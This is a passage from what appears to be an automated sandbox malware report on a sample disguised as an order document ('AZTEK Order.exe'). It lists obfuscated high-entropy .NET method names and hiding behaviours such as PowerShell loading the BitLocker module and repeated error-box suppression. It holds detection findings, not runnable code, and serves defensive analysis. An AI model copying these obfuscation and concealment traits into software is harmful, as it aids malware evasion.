            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.csHigh entropy of concatenated method names: 'Lhkt50BnTe', 'fm5tUJUIgf', 'pB7tJqeovL', 'nmttK4RPu1', 'VwAt32QsZg', 'nvRtR9CMEi', 'K4JtqiDJU0', 'N4LtfnrjPU', 'QFMtVYLYDk', 'PUetrfaAxs'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, V9PtclERpC4X1BqTDy.csHigh entropy of concatenated method names: 'zlJiUTq9mm', 'QRTiJIZijr', 'HH4iKfqR5U', 'etsi3CfVuT', 'qKdiRVihU2', 'yoAiqywsJB', 'uQRifqd9M1', 'Ds3iVwTGX4', 'MRFir7qI7x', 'yPkiXPTmkB'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, suymARO42b2OJQh7HL.csHigh entropy of concatenated method names: 'SgtByHPyMM', 'sc3BCa3DL5', 'gw1BO5mKhI', 'zc6BWw5rB2', 'K1UBsww97X', 'oapBYj08tX', 'Yi1BA313Nm', 'WpDB6lkKVc', 'Uw7B8KmsS4', 'hpVBZjTYUl'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, QM8C5hZiKlLbJdDmtr.csHigh entropy of concatenated method names: 'RlcqU2f37u', 'cXLqKYJdwS', 'Fr7qRCTA5j', 'EZbRw8VO6M', 'ICRRzIsa5l', 'F1bqIoMBmb', 'LshqPVDfj7', 'W9oq1gN2Sr', 'QwCqt25MK6', 'm3fqpag7y3'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, BSsJEhcGdlS5HkGCDT.csHigh entropy of concatenated method names: 'lONillSj2l', 'j01isx4a9G', 'tnoiYXDeuF', 'XnZiA97QnA', 'sV3iOylteT', 'EgUi6tCbkb', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, dB7d8mFu5eUU8getxb.csHigh entropy of concatenated method names: 'Tcu3GYEDkC', 'bG83bWvdmX', 'VIHKY4EQp0', 'G6gKAaPYBJ', 'WrHK6oclEa', 'JJIK8COS25', 'aYQKZ1iAqV', 'LAOKuUOTst', 'GewK7XJ3bR', 'eA5Kyk5hZV'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, Jhfxhhw7tJ6PfM1FNn.csHigh entropy of concatenated method names: 'iIANPlssTI', 'HSENtVjiQ7', 'yMENpUt7KJ', 'UWPNU3V7xl', 'WRrNJlD5NZ', 'qOfN3jWWDe', 'ewfNRNbvXO', 'GDSi2cdQgJ', 'dXZiEKpoey', 'lncic0yNnP'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, LMx5uOpTP1v1ft95hN.csHigh entropy of concatenated method names: 'weZPqhKXYD', 'VrCPfC31IY', 'my7PrRm4lP', 'pbFPXttB7d', 'netPBxbkgF', 'mk5PvnN0ba', 'drT0eWmXUAGwcTO4Ke', 'etuNcYTpLcZdhdIFSO', 'UvZPP8mpuD', 'xOXPtmMpUP'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, plyn4AzrwpREROgjZj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'desNg4WXyt', 'fQ1NBiPAkp', 'KCENvrmL82', 'AHGNmlqbTn', 'ruuNiM8eXV', 'ophNNtZ71I', 'B4lN01l2BA'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, IJHR3K72f7raiuBq1W.csHigh entropy of concatenated method names: 'QfYqhUImDQ', 'xwVqesdrdf', 'IY8qkc2h1P', 'iyWqdpc3hZ', 'asPqGZnpk2', 'C26qHxpaH4', 'HwpqbG3oqH', 'smuqn2jKet', 'otuqTaTVbj', 'YIuqFT66hX'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, qA9RwWS5F6FWCWFdeB.csHigh entropy of concatenated method names: 'FlTmrOANRC', 'WECmX77WOl', 'ToString', 'SV4mUJYMnP', 'uxhmJl3V9R', 'YLTmKHXdT9', 'vEDm31VvQy', 'JkJmRaQDj1', 'qDLmq0jOSc', 'AlPmf2LUYj'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, LhKXYDnDrCC31IYC1l.csHigh entropy of concatenated method names: 'R4cJOAYNcS', 'YgSJWBRnUX', 'evHJx9oAe3', 'po6JSteB30', 'd2RJoyyN2q', 'Pw4JDiLgBu', 'KLiJ2UPpDc', 'nlCJEEXRVp', 'hpoJcScTW1', 'lZdJw1nbm9'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, eV9V7MD7jcQe67EKiX.csHigh entropy of concatenated method names: 'JvHmE5KpPe', 'glTmwpnVcW', 'Xs2iIQY4a7', 'VwKiPbQIQ7', 'Rs1m4iOMS7', 'e3emCoQkKu', 'y91mQMuKZ3', 'tLNmOw8VHX', 'EZomWV0A6m', 't98mxlHK31'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, ylQaofKffa4LIes7R5.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'lCc1cEwMwj', 'jJc1wnYHRm', 'qAv1zT1f33', 'APetIRtgDe', 'hBstPBbNfG', 'LwKt1Ehcvv', 'U0Uttc3pKE', 'oHlEoL6GLIiVXjYAsJ7'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, XtCPEIPI0vwmxjU1yCT.csHigh entropy of concatenated method names: 'QojNh0xZdI', 'KtSNeTgyWP', 'J1cNkmDnrc', 'IpLNdIYI4O', 'yb4NGkTU3R', 'FnDNHwboah', 'i0QNbvL49o', 'SS8NnPUZKK', 'PrfNTAtIy4', 'ovtNFuubYc'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, pdbENd1sSmsdBwH33k.csHigh entropy of concatenated method names: 'htvkcm1cW', 't9ndSAATO', 'NdqHHyi4i', 'wJabu52bW', 'fPPT19gao', 'DLVFo7bST', 'A5jUqYDi5jrufkj4C8', 'nc0XIWRIbcPoBO0RsU', 'R8hZtxpOtPGcYB5cWU', 'm9liiXFpk'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, lQu5AaJnCEQNfsoTrX.csHigh entropy of concatenated method names: 'Dispose', 'SjpPc5TKLg', 'mJR1sVmfeQ', 'zJXffgd7bH', 'rD9PwPtclR', 'dC4PzX1BqT', 'ProcessDialogKey', 'UyG1ISsJEh', 'Bdl1PS5HkG', 'PDT11Ahfxh'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, tbwg0rTy7Rm4lPvbFt.csHigh entropy of concatenated method names: 'svLKdyeQl3', 'b0nKHB1jeD', 'DhjKngmTFd', 'eHBKT4f482', 'k4CKBBPMiw', 'aQ2KvITvkX', 'y4RKmrBkDT', 'ipTKiR2VoU', 'txOKNVw479', 'Jp5K0ZUkYF'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, Dra8tFQfXTtjhUEabr.csHigh entropy of concatenated method names: 'prDgnyK5UO', 'i7QgTbg8Qj', 'RhcglyGOlM', 'fDcgsv8m9T', 'bNlgAh5rFh', 'kGOg61g2Sw', 'M5ugZHgt5t', 'yNKguR8ihO', 'tlBgyruPUK', 'RUPg41hsLF'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, zgFrk5lnN0batYPMjA.csHigh entropy of concatenated method names: 'yG1R5vUfow', 'sSDRJooOeh', 'JuoR3aQ2k4', 'xDrRqK4sfJ', 'kJlRffYJrK', 'EIK3oBi8aO', 'QXB3DUgcna', 'Yk732KGW77', 'jHo3EYVNYX', 'DDT3cS8f2P'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.csHigh entropy of concatenated method names: 'Lhkt50BnTe', 'fm5tUJUIgf', 'pB7tJqeovL', 'nmttK4RPu1', 'VwAt32QsZg', 'nvRtR9CMEi', 'K4JtqiDJU0', 'N4LtfnrjPU', 'QFMtVYLYDk', 'PUetrfaAxs'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, V9PtclERpC4X1BqTDy.csHigh entropy of concatenated method names: 'zlJiUTq9mm', 'QRTiJIZijr', 'HH4iKfqR5U', 'etsi3CfVuT', 'qKdiRVihU2', 'yoAiqywsJB', 'uQRifqd9M1', 'Ds3iVwTGX4', 'MRFir7qI7x', 'yPkiXPTmkB'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, suymARO42b2OJQh7HL.csHigh entropy of concatenated method names: 'SgtByHPyMM', 'sc3BCa3DL5', 'gw1BO5mKhI', 'zc6BWw5rB2', 'K1UBsww97X', 'oapBYj08tX', 'Yi1BA313Nm', 'WpDB6lkKVc', 'Uw7B8KmsS4', 'hpVBZjTYUl'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, QM8C5hZiKlLbJdDmtr.csHigh entropy of concatenated method names: 'RlcqU2f37u', 'cXLqKYJdwS', 'Fr7qRCTA5j', 'EZbRw8VO6M', 'ICRRzIsa5l', 'F1bqIoMBmb', 'LshqPVDfj7', 'W9oq1gN2Sr', 'QwCqt25MK6', 'm3fqpag7y3'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, BSsJEhcGdlS5HkGCDT.csHigh entropy of concatenated method names: 'lONillSj2l', 'j01isx4a9G', 'tnoiYXDeuF', 'XnZiA97QnA', 'sV3iOylteT', 'EgUi6tCbkb', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, dB7d8mFu5eUU8getxb.csHigh entropy of concatenated method names: 'Tcu3GYEDkC', 'bG83bWvdmX', 'VIHKY4EQp0', 'G6gKAaPYBJ', 'WrHK6oclEa', 'JJIK8COS25', 'aYQKZ1iAqV', 'LAOKuUOTst', 'GewK7XJ3bR', 'eA5Kyk5hZV'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, Jhfxhhw7tJ6PfM1FNn.csHigh entropy of concatenated method names: 'iIANPlssTI', 'HSENtVjiQ7', 'yMENpUt7KJ', 'UWPNU3V7xl', 'WRrNJlD5NZ', 'qOfN3jWWDe', 'ewfNRNbvXO', 'GDSi2cdQgJ', 'dXZiEKpoey', 'lncic0yNnP'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, LMx5uOpTP1v1ft95hN.csHigh entropy of concatenated method names: 'weZPqhKXYD', 'VrCPfC31IY', 'my7PrRm4lP', 'pbFPXttB7d', 'netPBxbkgF', 'mk5PvnN0ba', 'drT0eWmXUAGwcTO4Ke', 'etuNcYTpLcZdhdIFSO', 'UvZPP8mpuD', 'xOXPtmMpUP'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, plyn4AzrwpREROgjZj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'desNg4WXyt', 'fQ1NBiPAkp', 'KCENvrmL82', 'AHGNmlqbTn', 'ruuNiM8eXV', 'ophNNtZ71I', 'B4lN01l2BA'
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, IJHR3K72f7raiuBq1W.csHigh entropy of concatenated method names: 'QfYqhUImDQ', 'xwVqesdrdf', 'IY8qkc2h1P', 'iyWqdpc3hZ', 'asPqGZnpk2', 'C26qHxpaH4', 'HwpqbG3oqH', 'smuqn2jKet', 'otuqTaTVbj', 'YIuqFT66hX'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
